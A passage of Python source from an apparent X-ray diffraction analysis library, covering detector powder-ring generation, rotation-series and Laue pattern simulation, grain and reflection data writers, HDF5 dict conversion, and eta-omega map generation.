ij_frac[:, 1])*img[i_floor_img, j_floor_img] \\\n + (ij_frac[:, 1] - j_floor)*img[i_floor_img, j_ceil_img]\n row_ceil_int = \\\n (j_ceil - ij_frac[:, 1])*img[i_ceil_img, j_floor_img] \\\n + (ij_frac[:, 1] - j_floor)*img[i_ceil_img, j_ceil_img]\n\n # next interpolate across cols\n int_vals = \\\n (i_ceil - ij_frac[:, 0])*row_floor_int \\\n + (ij_frac[:, 0] - i_floor)*row_ceil_int\n int_xy[on_panel] = int_vals\n return int_xy\n\n def make_powder_rings(\n self, pd, merge_hkls=False, delta_tth=None,\n delta_eta=10., eta_period=None, eta_list=None,\n rmat_s=ct.identity_3x3, tvec_s=ct.zeros_3,\n tvec_c=ct.zeros_3, full_output=False):\n \"\"\"\n Generate points on Debye_Scherrer rings over the detector.\n\n !!! it is assuming that rmat_s is built from (chi, ome) as it the case\n for HEDM!\n\n Parameters\n ----------\n pd : TYPE\n DESCRIPTION.\n merge_hkls : TYPE, optional\n DESCRIPTION. The default is False.\n delta_tth : TYPE, optional\n DESCRIPTION. The default is None.\n delta_eta : TYPE, optional\n DESCRIPTION. The default is 10..\n eta_period : TYPE, optional\n DESCRIPTION. The default is None.\n eta_list : TYPE, optional\n DESCRIPTION. The default is None.\n rmat_s : TYPE, optional\n DESCRIPTION. The default is ct.identity_3x3.\n tvec_s : TYPE, optional\n DESCRIPTION. The default is ct.zeros_3.\n tvec_c : TYPE, optional\n DESCRIPTION. The default is ct.zeros_3.\n full_output : TYPE, optional\n DESCRIPTION. The default is False.\n\n Raises\n ------\n RuntimeError\n DESCRIPTION.\n\n Returns\n -------\n TYPE\n DESCRIPTION.\n\n \"\"\"\n # in case you want to give it tth angles directly\n if hasattr(pd, '__len__'):\n tth = np.array(pd).flatten()\n if delta_tth is None:\n raise RuntimeError(\n \"If supplying a 2theta list as first arg, \"\n + \"must supply a delta_tth\")\n sector_vertices = np.tile(\n 0.5*np.radians([-delta_tth, -delta_eta,\n -delta_tth, delta_eta,\n delta_tth, delta_eta,\n delta_tth, -delta_eta,\n 0.0, 0.0]), (len(tth), 1)\n )\n # Convert to radians as is done below\n del_eta = np.radians(delta_eta)\n else:\n # Okay, we have a PlaneData object\n try:\n pd = PlaneData.makeNew(pd) # make a copy to munge\n except(TypeError):\n # !!! have some other object here, likely a dummy plane data\n # object of some sort...\n pass\n\n if delta_tth is not None:\n pd.tThWidth = np.radians(delta_tth)\n else:\n delta_tth = np.degrees(pd.tThWidth)\n\n # conversions, meh...\n del_eta = np.radians(delta_eta)\n\n # do merging if asked\n if merge_hkls:\n _, tth_ranges = pd.getMergedRanges(cullDupl=True)\n tth = np.array([0.5*sum(i) for i in tth_ranges])\n else:\n tth_ranges = pd.getTThRanges()\n tth = pd.getTTh()\n tth_pm = tth_ranges - np.tile(tth, (2, 1)).T\n sector_vertices = np.vstack(\n [[i[0], -del_eta,\n i[0], del_eta,\n i[1], del_eta,\n i[1], -del_eta,\n 0.0, 0.0]\n for i in tth_pm])\n\n # for generating rings, make eta vector in correct period\n if eta_period is None:\n eta_period = (-np.pi, np.pi)\n\n if eta_list is None:\n neta = int(360./float(delta_eta))\n # this is the vector of ETA EDGES\n eta_edges = mapAngle(\n np.radians(\n delta_eta*np.linspace(0., neta, num=neta + 1)\n ) + eta_period[0],\n eta_period\n )\n\n # get eta bin centers from edges\n \"\"\"\n # !!! this way is probably overkill, since we have delta eta\n eta_centers = np.average(\n np.vstack([eta[:-1], eta[1:]),\n axis=0)\n \"\"\"\n # !!! should be safe as eta_edges are monotonic\n eta_centers = eta_edges[:-1] + 0.5*del_eta\n else:\n eta_centers = np.radians(eta_list).flatten()\n neta = len(eta_centers)\n eta_edges = (\n np.tile(eta_centers, (2, 1)) +\n np.tile(0.5*del_eta*np.r_[-1, 1], (neta, 1)).T\n ).T.flatten()\n\n # get chi and ome from rmat_s\n # ??? not needed chi = np.arctan2(rmat_s[2, 1], rmat_s[1, 1])\n ome = np.arctan2(rmat_s[0, 2], rmat_s[0, 0])\n\n # make list of angle tuples\n angs = [\n np.vstack(\n [i*np.ones(neta), eta_centers, ome*np.ones(neta)]\n ) for i in tth\n ]\n\n # need xy coords and pixel sizes\n valid_ang = []\n valid_xy = []\n map_indices = []\n npp = 5 # [ll, ul, ur, lr, center]\n for i_ring in range(len(angs)):\n # expand angles to patch vertices\n these_angs = angs[i_ring].T\n patch_vertices = (\n np.tile(these_angs[:, :2], (1, npp))\n + np.tile(sector_vertices[i_ring], (neta, 1))\n ).reshape(npp*neta, 2)\n\n # duplicate ome array\n ome_dupl = np.tile(\n these_angs[:, 2], (npp, 1)\n ).T.reshape(npp*neta, 1)\n\n # find vertices that all fall on the panel\n gVec_ring_l = anglesToGVec(\n np.hstack([patch_vertices, ome_dupl]),\n bHat_l=self.bvec)\n all_xy = gvecToDetectorXY(\n gVec_ring_l,\n self.rmat, rmat_s, ct.identity_3x3,\n self.tvec, tvec_s, tvec_c,\n beamVec=self.bvec)\n if self.distortion is not None:\n all_xy = self.distortion.apply_inverse(all_xy)\n\n _, on_panel = self.clip_to_panel(all_xy)\n\n # all vertices must be on...\n patch_is_on = np.all(on_panel.reshape(neta, npp), axis=1)\n patch_xys = all_xy.reshape(neta, 5, 2)[patch_is_on]\n\n # form output arrays\n valid_ang.append(these_angs[patch_is_on, :2])\n valid_xy.append(patch_xys[:, -1, :].squeeze())\n map_indices.append(patch_is_on)\n pass\n # ??? is this option necessary?\n if full_output:\n return valid_ang, valid_xy, map_indices, eta_edges\n else:\n return valid_ang, valid_xy\n\n def map_to_plane(self, pts, rmat, tvec):\n \"\"\"\n Map detctor points to specified plane.\n\n Parameters\n ----------\n pts : TYPE\n DESCRIPTION.\n rmat : TYPE\n DESCRIPTION.\n tvec : TYPE\n DESCRIPTION.\n\n Returns\n -------\n TYPE\n DESCRIPTION.\n\n Notes\n -----\n by convention:\n\n n * (u*pts_l - tvec) = 0\n\n [pts]_l = rmat*[pts]_m + tvec\n\n \"\"\"\n # arg munging\n pts = np.atleast_2d(pts)\n npts = len(pts)\n\n # map plane normal & translation vector, LAB FRAME\n nvec_map_lab = rmat[:, 2].reshape(3, 1)\n tvec_map_lab = np.atleast_2d(tvec).reshape(3, 1)\n tvec_d_lab = np.atleast_2d(self.tvec).reshape(3, 1)\n\n # put pts as 3-d in panel CS and transform to 3-d lab coords\n pts_det = np.hstack([pts, np.zeros((npts, 1))])\n pts_lab = np.dot(self.rmat, pts_det.T) + tvec_d_lab\n\n # scaling along pts vectors to hit map plane\n u = np.dot(nvec_map_lab.T, tvec_map_lab) \\\n / np.dot(nvec_map_lab.T, pts_lab)\n\n # pts on map plane, in LAB FRAME\n pts_map_lab = np.tile(u, (3, 1)) * pts_lab\n\n return np.dot(rmat.T, pts_map_lab - tvec_map_lab)[:2, :].T\n\n def simulate_rotation_series(self, plane_data, grain_param_list,\n eta_ranges=[(-np.pi, np.pi), ],\n ome_ranges=[(-np.pi, np.pi), ],\n ome_period=(-np.pi, np.pi),\n chi=0., tVec_s=ct.zeros_3,\n wavelength=None):\n \"\"\"\n Simulate a monochromatic rotation series for a list of grains.\n\n Parameters\n ----------\n plane_data : TYPE\n DESCRIPTION.\n grain_param_list : TYPE\n DESCRIPTION.\n eta_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_period : TYPE, optional\n DESCRIPTION. The default is (-np.pi, np.pi).\n chi : TYPE, optional\n DESCRIPTION. The default is 0..\n tVec_s : TYPE, optional\n DESCRIPTION. The default is ct.zeros_3.\n wavelength : TYPE, optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n valid_ids : TYPE\n DESCRIPTION.\n valid_hkls : TYPE\n DESCRIPTION.\n valid_angs : TYPE\n DESCRIPTION.\n valid_xys : TYPE\n DESCRIPTION.\n ang_pixel_size : TYPE\n DESCRIPTION.\n\n \"\"\"\n # grab B-matrix from plane data\n bMat = plane_data.latVecOps['B']\n\n # reconcile wavelength\n # * added sanity check on exclusions here; possible to\n # * make some reflections invalid (NaN)\n if wavelength is None:\n wavelength = plane_data.wavelength\n else:\n if plane_data.wavelength != wavelength:\n plane_data.wavelength = ct.keVToAngstrom(wavelength)\n assert not np.any(np.isnan(plane_data.getTTh())),\\\n \"plane data exclusions incompatible with wavelength\"\n\n # vstacked G-vector id, h, k, l\n full_hkls = xrdutil._fetch_hkls_from_planedata(plane_data)\n\n \"\"\" LOOP OVER GRAINS \"\"\"\n valid_ids = []\n valid_hkls = []\n valid_angs = []\n valid_xys = []\n ang_pixel_size = []\n for gparm in grain_param_list:\n\n # make useful parameters\n rMat_c = makeRotMatOfExpMap(gparm[:3])\n tVec_c = gparm[3:6]\n vInv_s = gparm[6:]\n\n # All possible bragg conditions as vstacked [tth, eta, ome]\n # for each omega solution\n angList = np.vstack(\n oscillAnglesOfHKLs(\n full_hkls[:, 1:], chi,\n rMat_c, bMat, wavelength,\n vInv=vInv_s,\n )\n )\n\n # filter by eta and omega ranges\n # ??? get eta range from detector?\n allAngs, allHKLs = xrdutil._filter_hkls_eta_ome(\n full_hkls, angList, eta_ranges, ome_ranges\n )\n allAngs[:, 2] = mapAngle(allAngs[:, 2], ome_period)\n\n # find points that fall on the panel\n det_xy, rMat_s, on_plane = xrdutil._project_on_detector_plane(\n allAngs,\n self.rmat, rMat_c, chi,\n self.tvec, tVec_c, tVec_s,\n self.distortion)\n xys_p, on_panel = self.clip_to_panel(det_xy)\n valid_xys.append(xys_p)\n\n # filter angs and hkls that are on the detector plane\n # !!! check this -- seems unnecessary but the results of\n # _project_on_detector_plane() can have len < the input.\n # the output of _project_on_detector_plane has been modified to\n # hand back the index array to remedy this JVB 2020-05-27\n filtered_angs = np.atleast_2d(allAngs[on_plane, :])\n filtered_hkls = np.atleast_2d(allHKLs[on_plane, :])\n\n # grab hkls and gvec ids for this panel\n valid_hkls.append(filtered_hkls[on_panel, 1:])\n valid_ids.append(filtered_hkls[on_panel, 0])\n\n # reflection angles (voxel centers) and pixel size in (tth, eta)\n valid_angs.append(filtered_angs[on_panel, :])\n ang_pixel_size.append(self.angularPixelSize(xys_p))\n return valid_ids, valid_hkls, valid_angs, valid_xys, ang_pixel_size\n\n def simulate_laue_pattern(self, crystal_data,\n minEnergy=5., maxEnergy=35.,\n rmat_s=None, tvec_s=None,\n grain_params=None,\n beam_vec=None):\n \"\"\"\n \"\"\"\n if isinstance(crystal_data, PlaneData):\n\n plane_data = crystal_data\n\n # grab the expanded list of hkls from plane_data\n hkls = np.hstack(plane_data.getSymHKLs())\n\n # and the unit plane normals (G-vectors) in CRYSTAL FRAME\n gvec_c = np.dot(plane_data.latVecOps['B'], hkls)\n elif len(crystal_data) == 2:\n # !!! should clean this up\n hkls = np.array(crystal_data[0])\n bmat = crystal_data[1]\n gvec_c = np.dot(bmat, hkls)\n else:\n raise(RuntimeError, 'argument list not understood')\n nhkls_tot = hkls.shape[1]\n\n # parse energy ranges\n # TODO: allow for spectrum parsing\n multipleEnergyRanges = False\n if hasattr(maxEnergy, '__len__'):\n assert len(maxEnergy) == len(minEnergy), \\\n 'energy cutoff ranges must have the same length'\n multipleEnergyRanges = True\n lmin = []\n lmax = []\n for i in range(len(maxEnergy)):\n lmin.append(ct.keVToAngstrom(maxEnergy[i]))\n lmax.append(ct.keVToAngstrom(minEnergy[i]))\n else:\n lmin = ct.keVToAngstrom(maxEnergy)\n lmax = ct.keVToAngstrom(minEnergy)\n\n # parse grain parameters kwarg\n if grain_params is None:\n grain_params = np.atleast_2d(\n np.hstack([np.zeros(6), ct.identity_6x1])\n )\n n_grains = len(grain_params)\n\n # sample rotation\n if rmat_s is None:\n rmat_s = ct.identity_3x3\n\n # dummy translation vector... make input\n if tvec_s is None:\n tvec_s = ct.zeros_3\n\n # beam vector\n if beam_vec is None:\n beam_vec = ct.beam_vec\n\n # =========================================================================\n # LOOP OVER GRAINS\n # =========================================================================\n\n # pre-allocate output arrays\n xy_det = np.nan*np.ones((n_grains, nhkls_tot, 2))\n hkls_in = np.nan*np.ones((n_grains, 3, nhkls_tot))\n angles = np.nan*np.ones((n_grains, nhkls_tot, 2))\n dspacing = np.nan*np.ones((n_grains, nhkls_tot))\n energy = np.nan*np.ones((n_grains, nhkls_tot))\n for iG, gp in enumerate(grain_params):\n rmat_c = makeRotMatOfExpMap(gp[:3])\n tvec_c = gp[3:6].reshape(3, 1)\n vInv_s = mutil.vecMVToSymm(gp[6:].reshape(6, 1))\n\n # stretch them: V^(-1) * R * Gc\n gvec_s_str = np.dot(vInv_s, np.dot(rmat_c, gvec_c))\n ghat_c_str = mutil.unitVector(np.dot(rmat_c.T, gvec_s_str))\n\n # project\n dpts = gvecToDetectorXY(ghat_c_str.T,\n self.rmat, rmat_s, rmat_c,\n self.tvec, tvec_s, tvec_c,\n beamVec=beam_vec)\n\n # check intersections with detector plane\n canIntersect = ~np.isnan(dpts[:, 0])\n npts_in = sum(canIntersect)\n\n if np.any(canIntersect):\n dpts = dpts[canIntersect, :].reshape(npts_in, 2)\n dhkl = hkls[:, canIntersect].reshape(3, npts_in)\n\n # back to angles\n tth_eta, gvec_l = detectorXYToGvec(\n dpts,\n self.rmat, rmat_s,\n self.tvec, tvec_s, tvec_c,\n beamVec=beam_vec)\n tth_eta = np.vstack(tth_eta).T\n\n # warp measured points\n if self.distortion is not None:\n dpts = self.distortion.apply_inverse(dpts)\n\n # plane spacings and energies\n dsp = 1. / rowNorm(gvec_s_str[:, canIntersect].T)\n wlen = 2*dsp*np.sin(0.5*tth_eta[:, 0])\n\n # clip to detector panel\n _, on_panel = self.clip_to_panel(dpts, buffer_edges=True)\n\n if multipleEnergyRanges:\n validEnergy = np.zeros(len(wlen), dtype=bool)\n for i in range(len(lmin)):\n in_energy_range = np.logical_and(\n wlen >= lmin[i],\n wlen <= lmax[i])\n validEnergy = validEnergy | in_energy_range\n pass\n else:\n validEnergy = np.logical_and(wlen >= lmin, wlen <= lmax)\n pass\n\n # index for valid reflections\n keepers = np.where(np.logical_and(on_panel, validEnergy))[0]\n\n # assign output arrays\n xy_det[iG][keepers, :] = dpts[keepers, :]\n hkls_in[iG][:, keepers] = dhkl[:, keepers]\n angles[iG][keepers, :] = tth_eta[keepers, :]\n dspacing[iG, keepers] = dsp[keepers]\n energy[iG, keepers] = ct.keVToAngstrom(wlen[keepers])\n pass # close conditional on valids\n pass # close loop on grains\n return xy_det, hkls_in, angles, dspacing, energy\n\n\n# =============================================================================\n# UTILITIES\n# =============================================================================\n\n\nclass PatchDataWriter(object):\n \"\"\"Class for dumping Bragg reflection data.\"\"\"\n\n def __init__(self, filename):\n self._delim = ' '\n header_items = (\n '# ID', 'PID',\n 'H', 'K', 'L',\n 'sum(int)', 'max(int)',\n 'pred tth', 'pred eta', 'pred ome',\n 'meas tth', 'meas eta', 'meas ome',\n 'pred X', 'pred Y',\n 'meas X', 'meas Y'\n )\n self._header = self._delim.join([\n self._delim.join(np.tile('{:<6}', 5)).format(*header_items[:5]),\n self._delim.join(np.tile('{:<12}', 2)).format(*header_items[5:7]),\n self._delim.join(np.tile('{:<23}', 10)).format(*header_items[7:17])\n ])\n if isinstance(filename, IOBase):\n self.fid = filename\n else:\n self.fid = open(filename, 'w')\n print(self._header, file=self.fid)\n\n def __del__(self):\n self.close()\n\n def close(self):\n self.fid.close()\n\n def dump_patch(self, peak_id, hkl_id,\n hkl, spot_int, max_int,\n pangs, mangs, pxy, mxy):\n \"\"\"\n !!! maybe need to check that last four inputs are arrays\n \"\"\"\n if mangs is None:\n spot_int = np.nan\n max_int = np.nan\n mangs = np.nan*np.ones(3)\n mxy = np.nan*np.ones(2)\n\n res = [int(peak_id), int(hkl_id)] \\\n + np.array(hkl, dtype=int).tolist() \\\n + [spot_int, max_int] \\\n + pangs.tolist() \\\n + mangs.tolist() \\\n + pxy.tolist() \\\n + mxy.tolist()\n\n output_str = self._delim.join(\n [self._delim.join(np.tile('{:<6d}', 5)).format(*res[:5]),\n self._delim.join(np.tile('{:<12e}', 2)).format(*res[5:7]),\n self._delim.join(np.tile('{:<23.16e}', 10)).format(*res[7:])]\n )\n print(output_str, file=self.fid)\n return output_str\n\n\nclass GrainDataWriter(object):\n \"\"\"Class for dumping grain data.\"\"\"\n\n def __init__(self, filename=None, array=None):\n \"\"\"Writes to either file or np array\n\n Array must be initialized with number of rows to be written.\n \"\"\"\n if filename is None and array is None:\n raise RuntimeError(\n 'GrainDataWriter must be specified with filename or array')\n\n self.array = None\n self.fid = None\n\n # array supersedes filename\n if array is not None:\n assert array.shape[1] == 21, \\\n f'grain data table must have 21 columns not {array.shape[21]}'\n self.array = array\n self._array_row = 0\n return\n\n self._delim = ' '\n header_items = (\n '# grain ID', 'completeness', 'chi^2',\n 'exp_map_c[0]', 'exp_map_c[1]', 'exp_map_c[2]',\n 't_vec_c[0]', 't_vec_c[1]', 't_vec_c[2]',\n 'inv(V_s)[0,0]', 'inv(V_s)[1,1]', 'inv(V_s)[2,2]',\n 'inv(V_s)[1,2]*sqrt(2)',\n 'inv(V_s)[0,2]*sqrt(2)',\n 'inv(V_s)[0,1]*sqrt(2)',\n 'ln(V_s)[0,0]', 'ln(V_s)[1,1]', 'ln(V_s)[2,2]',\n 'ln(V_s)[1,2]', 'ln(V_s)[0,2]', 'ln(V_s)[0,1]'\n )\n self._header = self._delim.join(\n [self._delim.join(\n np.tile('{:<12}', 3)\n ).format(*header_items[:3]),\n self._delim.join(\n np.tile('{:<23}', len(header_items) - 3)\n ).format(*header_items[3:])]\n )\n if isinstance(filename, IOBase):\n self.fid = filename\n else:\n self.fid = open(filename, 'w')\n print(self._header, file=self.fid)\n\n def __del__(self):\n self.close()\n\n def close(self):\n if self.fid is not None:\n self.fid.close()\n\n def dump_grain(self, grain_id, completeness, chisq,\n grain_params):\n assert len(grain_params) == 12, \\\n \"len(grain_params) must be 12, not %d\" % len(grain_params)\n\n # extract strain\n emat = logm(np.linalg.inv(mutil.vecMVToSymm(grain_params[6:])))\n evec = mutil.symmToVecMV(emat, scale=False)\n\n res = [int(grain_id), completeness, chisq] \\\n + grain_params.tolist() \\\n + evec.tolist()\n\n if self.array is not None:\n row = self._array_row\n assert row < self.array.shape[0], \\\n f'invalid row {row} in array table'\n self.array[row] = res\n self._array_row += 1\n return res\n\n # (else) format and write to file\n output_str = self._delim.join(\n [self._delim.join(\n ['{:<12d}', '{:<12f}', '{:<12e}']\n ).format(*res[:3]),\n self._delim.join(\n np.tile('{:<23.16e}', len(res) - 3)\n ).format(*res[3:])]\n )\n print(output_str, file=self.fid)\n return output_str\n\n\nclass GrainDataWriter_h5(object):\n \"\"\"Class for dumping grain results to an HDF5 archive.\n\n TODO: add material spec\n \"\"\"\n\n def __init__(self, filename, instr_cfg, grain_params, use_attr=False):\n if isinstance(filename, h5py.File):\n self.fid = filename\n else:\n self.fid = h5py.File(filename + \".hdf5\", \"w\")\n icfg = dict(instr_cfg)\n\n # add instrument groups and attributes\n self.instr_grp = self.fid.create_group('instrument')\n unwrap_dict_to_h5(self.instr_grp, icfg, asattr=use_attr)\n\n # add grain group\n self.grain_grp = self.fid.create_group('grain')\n rmat_c = makeRotMatOfExpMap(grain_params[:3])\n tvec_c = np.array(grain_params[3:6]).flatten()\n vinv_s = np.array(grain_params[6:]).flatten()\n vmat_s = np.linalg.inv(mutil.vecMVToSymm(vinv_s))\n\n if use_attr: # attribute version\n self.grain_grp.attrs.create('rmat_c', rmat_c)\n self.grain_grp.attrs.create('tvec_c', tvec_c)\n self.grain_grp.attrs.create('inv(V)_s', vinv_s)\n self.grain_grp.attrs.create('vmat_s', vmat_s)\n else: # dataset version\n self.grain_grp.create_dataset('rmat_c', data=rmat_c)\n self.grain_grp.create_dataset('tvec_c', data=tvec_c)\n self.grain_grp.create_dataset('inv(V)_s', data=vinv_s)\n self.grain_grp.create_dataset('vmat_s', data=vmat_s)\n\n data_key = 'reflection_data'\n self.data_grp = self.fid.create_group(data_key)\n\n for det_key in self.instr_grp['detectors'].keys():\n self.data_grp.create_group(det_key)\n\n # FIXME: throws exception when called after close method\n # def __del__(self):\n # self.close()\n\n def close(self):\n self.fid.close()\n\n def dump_patch(self, panel_id,\n i_refl, peak_id, hkl_id, hkl,\n tth_edges, eta_edges, ome_centers,\n xy_centers, ijs, frame_indices,\n spot_data, pangs, pxy, mangs, mxy, gzip=1):\n \"\"\"\n to be called inside loop over patches\n\n default GZIP level for data arrays is 1\n \"\"\"\n fi = np.array(frame_indices, dtype=int)\n\n panel_grp = self.data_grp[panel_id]\n spot_grp = panel_grp.create_group(\"spot_%05d\" % i_refl)\n spot_grp.attrs.create('peak_id', int(peak_id))\n spot_grp.attrs.create('hkl_id', int(hkl_id))\n spot_grp.attrs.create('hkl', np.array(hkl, dtype=int))\n spot_grp.attrs.create('predicted_angles', pangs)\n spot_grp.attrs.create('predicted_xy', pxy)\n if mangs is None:\n mangs = np.nan*np.ones(3)\n spot_grp.attrs.create('measured_angles', mangs)\n if mxy is None:\n mxy = np.nan*np.ones(3)\n spot_grp.attrs.create('measured_xy', mxy)\n\n # get centers crds from edge arrays\n # FIXME: export full coordinate arrays, or just center vectors???\n #\n # ome_crd, eta_crd, tth_crd = np.meshgrid(\n # ome_centers,\n # centers_of_edge_vec(eta_edges),\n # centers_of_edge_vec(tth_edges),\n # indexing='ij')\n #\n # ome_dim, eta_dim, tth_dim = spot_data.shape\n\n # !!! for now just exporting center vectors for spot_data\n tth_crd = centers_of_edge_vec(tth_edges)\n eta_crd = centers_of_edge_vec(eta_edges)\n\n shuffle_data = True # reduces size by 20%\n spot_grp.create_dataset('tth_crd', data=tth_crd,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('eta_crd', data=eta_crd,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('ome_crd', data=ome_centers,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('xy_centers', data=xy_centers,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('ij_centers', data=ijs,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('frame_indices', data=fi,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('intensities', data=spot_data,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n return\n\n\ndef unwrap_dict_to_h5(grp, d, asattr=False):\n \"\"\"\n Unwraps a dictionary to an HDF5 file of the same structure.\n\n Parameters\n ----------\n grp : HDF5 group object\n The HDF5 group to recursively unwrap the dict into.\n d : dict\n Input dict (of dicts).\n asattr : bool, optional\n Flag to write end member in dictionary tree to an attribute. If False,\n if writes the object to a dataset using numpy. The default is False.\n\n Returns\n -------\n None.\n\n \"\"\"\n while len(d) > 0:\n key, item = d.popitem()\n if isinstance(item, dict):\n subgrp = grp.create_group(key)\n unwrap_dict_to_h5(subgrp, item, asattr=asattr)\n else:\n if asattr:\n grp.attrs.create(key, item)\n else:\n try:\n grp.create_dataset(key, data=np.atleast_1d(item))\n except(TypeError):\n # probably a string badness\n grp.create_dataset(key, data=item)\n\n\ndef unwrap_h5_to_dict(f, d):\n \"\"\"\n Unwraps a simple HDF5 file to a dictionary of the same structure.\n\n Parameters\n ----------\n f : HDF5 file (mode r)\n The input HDF5 file object.\n d : dict\n dictionary object to update.\n\n Returns\n -------\n None.\n\n Notes\n -----\n As written, ignores attributes and uses numpy to cast HDF5 datasets to\n dict entries. Checks for 'O' type arrays and casts to strings; also\n converts single-element arrays to scalars.\n \"\"\"\n for key, val in f.items():\n try:\n d[key] = {}\n unwrap_h5_to_dict(val, d[key])\n except(AttributeError):\n # reached a dataset\n if np.dtype(val) == 'O':\n d[key] = h5py_read_string(val)\n else:\n tmp = np.array(val)\n if tmp.ndim == 1 and len(tmp) == 1:\n d[key] = tmp[0]\n else:\n d[key] = tmp\n\n\nclass GenerateEtaOmeMaps(object):\n \"\"\"\n eta-ome map class derived from new image_series and YAML config\n\n ...for now...\n\n must provide:\n\n self.dataStore\n self.planeData\n self.iHKLList\n self.etaEdges # IN RADIANS\n self.omeEdges # IN RADIANS\n self.etas # IN RADIANS\n self.omegas # IN RADIANS\n\n \"\"\"\n\n def __init__(self, image_series_dict, instrument, plane_data,\n active_hkls=None, eta_step=0.25, threshold=None,\n ome_period=(0, 360)):\n \"\"\"\n image_series must be OmegaImageSeries class\n instrument_params must be a dict (loaded from yaml spec)\n active_hkls must be a list (required for now)\n \"\"\"\n\n self._planeData = plane_data\n\n # ???: change name of iHKLList?\n # ???: can we change the behavior of iHKLList?\n if active_hkls is None:\n n_rings = len(plane_data.getTTh())\n self._iHKLList = range(n_rings)\n else:\n self._iHKLList = active_hkls\n n_rings = len(active_hkls)\n\n # ???: need to pass a threshold?\n eta_mapping, etas = instrument.extract_polar_maps(\n plane_data, image_series_dict,\n active_hkls=active_hkls, threshold=threshold,\n tth_tol=None, eta_tol=eta_step)\n\n # grab a det key\n # WARNING: this process assumes that the imageseries for all panels\n # have the same length and omegas\n det_key = list(eta_mapping.keys())[0]\n data_store = []\n for i_ring in range(n_rings):\n full_map = np.zeros_like(eta_mapping[det_key][i_ring])\n nan_mask_full = np.zeros(\n (len(eta_mapping), full_map.shape[0], full_map.shape[1])\n )\n i_p = 0\n for det_key, eta_map in eta_mapping.items():\n nan_mask = ~np.isnan(eta_map[i_ring])\n nan_mask_full[i_p] = nan_mask\n full_map[nan_mask] += eta_map[i_ring][nan_mask]\n i_p += 1\n re_nan_these = np.sum(nan_mask_full, axis=0) == 0\n full_map[re_nan_these] = np.nan\n data_store.append(full_map)\n self._dataStore = data_store\n\n # handle omegas\n omegas_array = image_series_dict[det_key].metadata['omega']\n self._omegas = mapAngle(\n np.radians(np.average(omegas_array, axis=1)),\n np.radians(ome_period)\n )\n self._omeEdges = mapAngle(\n np.radians(np.r_[omegas_array[:, 0], omegas_array[-1, 1]]),\n np.radians(ome_period)\n )\n\n # !!! must avoid the case where omeEdges[0] = omeEdges[-1] for the\n # indexer to work properly\n if abs(self._omeEdges[0] - self._omeEdges[-1]) <= ct.sqrt_epsf:\n # !!! SIGNED delta ome\n del_ome = np.radians(omegas_array[0, 1] - omegas_array[0, 0])\n self._omeEdges[-1] = self._omeEdges[-2] + del_ome\n\n # handle etas\n # WARNING: unlinke the omegas in imageseries metadata,\n # these are in RADIANS and represent bin centers\n self._etaEdges = etas\n self._etas = self._etaEdges[:-1] + 0.5*np.radians(eta_step)\n\n @property\n def dataStore(self):\n return self._dataStore\n\n @property\n def planeData(self):\n return self._planeData\n\n @property\n def iHKLList(self):\n return np.atleast_1d(self._iHKLList).flatten()\n\n @property\n def etaEdges(self):\n return self._etaEdges\n\n @property\n def omeEdges(self):\n return self._omeEdges\n\n @property\n def etas(self):\n return self._etas\n\n @property\n def omegas(self):\n return self._omegas\n\n def save(self, filename):\n xrdutil.EtaOmeMaps.save_eta_ome_maps(self, filename)\n pass # end of class: GenerateEtaOmeMaps\n\n\ndef _row_edge_vec(rows, pixel_size_row):\n return pixel_size_row*(0.5*rows-np.arange(rows+1))\n\n\ndef _col_edge_vec(cols, pixel_size_col):\n return pixel_size_col*(np.arange(cols+1)-0.5*cols)\n\n\ndef _generate_pixel_solid_angles(start_stop, rows, cols, pixel_size_row,\n pixel_size_col, rmat, tvec):\n start, stop = start_stop\n row_edge_vec = _row_edge_vec(rows, pixel_size_row)\n col_edge_vec = _col_edge_vec(cols, pixel_size_col)\n\n nvtx = len(row_edge_vec) * len(col_edge_vec)\n # pixel vertex coords\n pvy, pvx = np.meshgrid(row_edge_vec, col_edge_vec, indexing='ij')\n\n # add Z_d coord and transform to lab frame\n pcrd_array_full = np.dot(\n np.vstack([pvx.flatten(), pvy.flatten(), np.zeros(nvtx)]).T,\n rmat.T\n ) + tvec\n\n conn = cellConnectivity(rows, cols)\n\n ret = np.empty(len(range(start, stop)), dtype=float)\n\n for i, ipix in enumerate(range(start, stop)):\n pix_conn = conn[ipix]\n vtx_list = pcrd_array_full[pix_conn, :]\n ret[i] = (_solid_angle_of_triangle(vtx_list[[0, 1, 2], :]) +\n _solid_angle_of_triangle(vtx_list[[2, 3, 0], :]))\n\n return ret\n\n\n@memoize\ndef _pixel_angles(origin, pixel_coords, distortion, rmat, tvec, bvec, evec,\n rows, cols):\n assert len(origin) == 3, \"origin must have 3 elements\"\n\n pix_i, pix_j = pixel_coords\n xy = np.ascontiguousarray(\n np.vstack([\n pix_j.flatten(), pix_i.flatten()\n ]).T\n )\n\n if distortion is not None:\n xy = distortion.apply(xy)\n\n angs, g_vec = detectorXYToGvec(\n xy, rmat, ct.identity_3x3,\n tvec, ct.zeros_3, origin,\n beamVec=bvec, etaVec=evec)\n\n tth = angs[0].reshape(rows, cols)\n eta = angs[1].reshape(rows, cols)\n return tth, eta\n\n\n@memoize\ndef _pixel_solid_angles(rows, cols, pixel_size_row, pixel_size_col,\n rmat, tvec, max_workers):\n # connectivity array for pixels\n conn = cellConnectivity(rows, cols)\n\n # result\n solid_angs = np.empty(len(conn), dtype=float)\n\n # Distribute tasks to each process\n tasks = distribute_tasks(len(conn), max_workers)\n kwargs = {\n 'rows': rows,\n 'cols': cols,\n 'pixel_size_row': pixel_size_row,\n 'pixel_size_col': pixel_size_col,\n 'rmat': rmat,\n 'tvec': tvec,\n }\n func = partial(_generate_pixel_solid_angles, **kwargs)\n with ProcessPoolExecutor(max_workers=max_workers) as executor:\n results = executor.map(func, tasks)\n\n # Concatenate all the results together\n 